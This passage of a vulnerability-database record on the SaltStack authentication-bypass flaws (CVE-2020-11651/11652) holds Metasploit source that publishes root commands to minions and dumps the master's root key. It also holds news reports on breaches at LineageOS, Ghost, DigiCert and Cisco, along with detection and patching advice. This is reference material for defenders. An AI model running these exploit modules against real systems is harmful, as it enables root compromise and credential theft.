'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'],\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_cmd\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T10:49:34", "description": "This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "cvss3": {}, "published": "2020-05-11T17:05:38", "type": "metasploit", "title": "SaltStack Salt Master Server Root Key Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-05-01T04:26:18", "id": "MSF:AUXILIARY-GATHER-SALTSTACK_SALT_ROOT_KEY-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/saltstack_salt_root_key/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',\n 'Description' => %q{\n This module exploits unauthenticated access to the _prep_auth_info()\n method in the SaltStack Salt master's ZeroMQ request server, for\n versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n root key used to authenticate administrative commands to the master.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump root key from Salt master' }]\n ],\n 'DefaultAction' => 'Dump',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506)\n ])\n end\n\n def run\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n unless (root_key = extract_root_key(yeet_prep_auth_info))\n print_error('Could not find root key in serialized auth info')\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"Root key: #{root_key}\")\n\n # I hate this API, but store the root key in creds, too\n create_credential_and_login(\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'salt/zeromq',\n username: 'root',\n private_data: root_key,\n private_type: :password\n )\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_prep_auth_info\n print_status(\"Yeeting _prep_auth_info() at #{peer}\")\n\n zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive auth info')\n end\n\n unless res.match(/user.+UserAuthenticationError.+root/m)\n fail_with(Failure::UnexpectedReply,\n \"Did not receive serialized auth info: #{res.inspect}\")\n end\n\n vprint_good('Received serialized auth info')\n\n # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack \"load\"\n res[4..-1]\n end\n\n def extract_root_key(auth_info)\n # Fetch root key from appropriate index of deserialized data, presumably\n MessagePack.unpack(auth_info)[2]&.fetch('root')\n rescue EOFError, KeyError, MessagePack::MalformedFormatError => e\n print_error(\"#{__method__} failed: #{e.message}\")\n nil\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/saltstack_salt_root_key.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:38:29", "description": "[](<https://thehackernews.com/images/-QFI5pQTBAm4/Xq_m167flHI/AAAAAAAAASw/6k68kbyVKkMF27nKUuZ-tsrwehX-N5saACLcBGAsYHQ/s728-e100/saltstack-salt-rce-vulnerability.jpg>)\n\nDays after cybersecurity researchers sounded the alarm over two critical vulnerabilities in the [SaltStack configuration framework](<https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html>), a hacking campaign has already begun exploiting the flaws to breach servers of LineageOS, Ghost, and DigiCert. \n \nTracked as **CVE-2020-11651** and **CVE-2020-11652**, the disclosed flaws could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. The issues were fixed by SaltStack in a [release](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>) published on April 29th. \n \n\"We expect that any competent hacker will be able to create 100% reliable exploits for these issues in under 24 hours,\" F-Secure researchers had previously warned in an advisory last week. \n \nLineageOS, a maker of an open-source operating system based on Android, said it detected the intrusion on May 2nd at around 8 pm Pacific Time. \n \n\"Around 8 pm PST on May 2nd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure,\" the [company noted](<https://status.lineageos.org/issues/5eae596b4a0ebd114676545f>) in its incident report but added Android builds and signing keys were unaffected by the breach. \n \nGhost, a Node.js based blogging platform, also fell victim to the same flaw. In its status page, the developers noted that \"around 1:30 am UTC on May 3rd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure\" and install a cryptocurrency miner. \n \n\"The mining attempt spiked CPUs and quickly overloaded most of our systems, which alerted us to the issue immediately,\" [Ghost added](<https://status.ghost.org/incidents/tpn078sqk973>). \n \nGhost, however, confirmed there was no evidence the incident resulted in a compromise of customer data, passwords, and financial information. \n \nBoth LineageOS and Ghost have restored the services after taking the servers offline to patch the systems and secure them behind a new firewall. \n \nIn a separate development, the Salt vulnerability was used to hack into DigiCert certificate authority as well. \n \n\"We discovered today that [CT Log](<https://www.digicert.com/certificate-transparency/overview.htm>) 2's key used to sign SCTs (signed certificate timestamps) was compromised last night at 7 pm via the Salt vulnerability,\" DigiCert's VP of Product Jeremy Rowley said in a [Google Groups](<https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM>) post made on Sunday. \n \nIn an email conversation with The Hacker News, DigiCert also said it's deactivating its CT 2 log server following the incident but clarified that the other certificate transparency logs, CT 1, Yeti, and Nessie were not impacted. \n \n\"On May 3, DigiCert announced that it is deactivating its Certificate Transparency (CT) 2 log server after determining that the key used to sign SCTs may have been exposed via critical SALT vulnerabilities,\" the [company said](<https://www.digicert.com/digicert-statement-on-ct2-log/>). \n \n\"We do not believe the key was used to sign SCTs outside of the CT log's normal operation, though as a precaution, CAs that received SCTs from the CT2 log after May 2 at 5 pm MST should receive an SCT from another trusted log. Three other DigiCert CT logs: CT1, Yeti, and Nessie, are not affected as they are run on completely different infrastructure. The impacts are limited to only the CT2 log and no other part of DigiCert's CA or CT Log systems,\" \n \nWith F-Secure's alert revealing [more than 6,000 Salt vulnerable servers](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) that can be exploited via this vulnerability, if left unpatched, companies are advised to update the Salt software packages to the latest version to resolve the flaws.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-04T04:00:00", "type": "thn", "title": "Hackers Breach LineageOS, Ghost, DigiCert Servers Using SaltStack Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T08:18:06", "id": "THN:00FCCD16591B1900512E0B089F2A6BC8", "href": "https://thehackernews.com/2020/05/saltstack-rce-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:29", "description": "[](<https://thehackernews.com/images/-ydy9Fzk0nqU/XqwePD5OqUI/AAAAAAAAASk/uWabw7-xCao9P2D4zR41IqwAZjzcMPYywCLcBGAsYHQ/s728-e100/saltstack-remote-code-execution-vulnerability.jpg>)\n\nTwo severe security flaws have been discovered in the open-source [SaltStack Salt configuration framework](<https://www.saltstack.com/>) that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. \n \nThe vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack [released](<https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf>) a patch (version 3000.2) [addressing the issues](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>), rated with CVSS score 10. \n \n\"The vulnerabilities, allocated CVE IDs [CVE-2020-11651](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) and [CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), are of two different classes,\" the cybersecurity [firm said](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>). \n \n\"One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server.\" \n \nThe researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to [secure the Salt environment](<https://docs.saltstack.com/en/master/topics/hardening.html#general-hardening-tips>). \n \n\n\n## Vulnerabilities in ZeroMQ Protocol\n\n \nSalt is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly. \n \nBuilt as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a \"master\" node that deploys the changes to a target group of \"minions\" (e.g., servers) en masse. \n \nThe [communication](<https://docs.saltstack.com/en/getstarted/system/communication.html>) between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a \"request server\" to which minions report the execution results and a \"publish server,\" where the master publishes messages that the minions can connect and subscribe to. \n \nAccording to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol. \n \n\"The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,\" the researchers said. \n \n\"The impact is full remote command execution as root on both the master and all minions that connect to it.\" \n \nIn other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands. \n \nWhat's more, a directory traversal vulnerability identified in the [wheel module](<https://docs.saltstack.com/en/master/ref/wheel/all/index.html>) \u2014 which has functions to read and write files to specific locations \u2014 can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths. \n \n\n\n## Detecting Vulnerable Salt Masters\n\n \nF-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet. \n \nDetecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. \"Exploitation of the authentication vulnerabilities will result in the ASCII strings \"_prep_auth_info\" or \"_send_pub\" appearing in data sent to the request server port (default 4506),\" it added. \n \nIt's highly recommended that Salt users update the software packages to the latest version. \n \n\"Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-01T13:04:00", "type": "thn", "title": "Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-06-10T14:48:28", "id": "THN:8E401822CBD35E8E7CCE9E5DD922A70E", "href": "https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-02T21:54:30", "description": "Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploit of critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure.\n\nGhost is a free, open-source blogging platform with an install base of over 2 million, including big-name customers like Mozilla and DuckDuckGo. The company, which touts itself as an alternative to platforms like WordPress, Medium and Tumblr, first posted on Sunday at 3:24 BST that customers were experiencing service outages. It has since fixed the issue and systems are up and running again, as of Monday.\n\nUpon further investigation, Ghost said that the hack stemmed from attackers exploiting two flaws, [CVE-2020-11651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651>) and[ CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), which allow full remote code execution as root on servers in data centers and cloud environments. The two flaws specifically exist in SaltStack\u2019s open-source Salt management framework, used by customers like Ghost as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of their servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAll traces of the crypto-mining virus were successfully eliminated yesterday, all systems remain stable, and we have not discovered any further concerns or issues on our network,\u201d according to Ghost\u2019s [announcement](<https://status.ghost.org/>) on its status update page. \u201cThe team is now working hard on remediation to clean and rebuild our entire network. We will keep this incident open and continue to share updates until it is fully resolved. We will also be contacting all customers directly to notify them of the incident, and publishing a public post-mortem later this week.\u201d\n\nCVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\nSaltStack has released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet. As such, researchers warned that they expect in-the-wild attacks to be launched against the flaws imminently.\n\nIt appears that some of those vulnerable Salt instances belonged to Ghost. After exploiting the flaws, attackers were able launch a cryptocurrency mining attack, which in turn spiked CPU usage and overloaded systems. Both Ghost Pro sites and Ghost.org billing services were affected \u2013 though Ghost said that credit card data was not affected. Ghost said that a fix has been implemented and that additional firewall configurations are now running.\n\n\u201cAt this time there is no evidence of any attempts to access any of our systems or data,\u201d according to Ghost. \u201cNevertheless, all sessions, passwords and keys are being cycled and all servers are being re-provisioned.\u201d\n\nAlex Peay, senior vice president of Product at SaltStack, told Threatpost that \u201cupon notification of the CVE, SaltStack took immediate action to remediate the vulnerability, develop and issue patches, and communicate to our customers about the affected versions so they can prepare their systems for update.\u201d\n\n\u201cWe must reinforce how critical it is that all Salt users patch their systems and follow the guidance we have provided outlining steps for remediation and best practices for Salt environment security,\u201d Peay said. \u201cIt is equally important to upgrade to latest versions of the platform and register with support for future awareness of any possible issues and remediations.\u201d\n\nThreatpost has reached out to Ghost for further comment.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T19:23:41", "type": "threatpost", "title": "Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T19:23:41", "id": "THREATPOST:A1F6C89E2D2F2205B93C6727C24B908C", "href": "https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:49", "description": "The open-source Salt management framework contains high-severity security vulnerabilities that allow full remote code execution as root on servers in data centers and cloud environments. And in-the-wild attacks are expected imminently.\n\nAccording to F-Secure researchers, the framework, authored by the company SaltStack but also used as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of servers, has a pair of flaws within its default communications protocol, known as ZeroMQ.\n\nA bug tracked as CVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bugs are especially dangerous given the topography of the Salt framework.\n\n\u201cEach server [managed by Salt] runs an agent called a \u2018minion,\u2019 which connects to a \u2018master,'\u201d explained F-Secure, [in a writeup](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) on Thursday. \u201c[A master is a] Salt installation that collects state reports from minions and publishes update messages that minions can act on.\u201d\n\nThese update messages are usually used to change the configuration of a selection of servers, but they can also be used to push out commands to multiple, or even all, of the managed systems, researchers said. An adversary thus can compromise the master in order to send malicious commands to all of the other servers in the cluster, all at the same time.\n\n## **Lapses in Protocol**\n\nTo communicate, the master uses two [ZeroMQ channels](<https://docs.saltstack.com/en/getstarted/system/communication.html>). As F-Secure explained, one is a \u201crequest server\u201d where minions can connect to report their status (or the output of commands). The other is a \u201cpublish server\u201d where the master publishes messages that the minions can connect and subscribe to.\n\nThe authentication bypass can be achieved because the ClearFuncs class processes unauthenticated requests and unintentionally exposes the \u201c_send_pub().\u201d This is the method used to queue messages from the master publish server to the minions \u2013 and thus can be used to send arbitrary commands. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nAlso, \u201cthe ClearFuncs class also exposes the method _prep_auth_info(), which returns the root key used to authenticate commands from the local root user on the master server. This root key can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\u201d\n\nAs for the directory traversal, the \u201cwheel\u201d module contains commands used to read and write files under specific directory paths.\n\n\u201cThe inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction,\u201d according to the writeup. \u201cThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing\u2026the reading of files outside of the intended directory.\u201d\n\nThe bugs together allow attackers \u201cwho can connect to the request server port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the master server filesystem and steal the secret key used to authenticate to the master as root,\u201d according to the firm.\n\nAccording to the National Vulnerability Database, \u201cThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\u201d\n\n## **Exploits in Less Than a Day**\n\nF-Secure said that it expects to see attacks in the wild very shortly.\n\n\u201cWe expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours,\u201d the researchers said, citing the \u201creliability and simplicity\u201d of exploitation.\n\nUnfortunately, the firm also said that a preliminary scan has revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet.\n\nPatches are available in release 3000.2. Also, \u201cadding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\u201d F-Secure concluded.\n\nTo detect a compromise, ASCII strings \u201c_prep_auth_info\u201d or \u201c_send_pub\u201d will show up in the request server port data (default 4506).\n\nAlso on the detection front, \u201cpublished messages to minions are called \u2018jobs\u2019 and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job IDs (\u2018jids\u2019) that look out of the ordinary,\u201d F-Secure noted.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-04-30T20:54:50", "type": "threatpost", "title": "Salt Bugs Allow Full RCE as Root on Cloud Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-5135"], "modified": "2020-04-30T20:54:50", "id": "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "href": "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:14", "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws incorporated in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco said that the update is \u201ccritical,\u201d ranking it 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet \u2014 and warned that exploits in the wild are imminent.\n\nThose predictions have proved true: In the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure to launch a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6) if the salt-master service is enabled \u201cthe 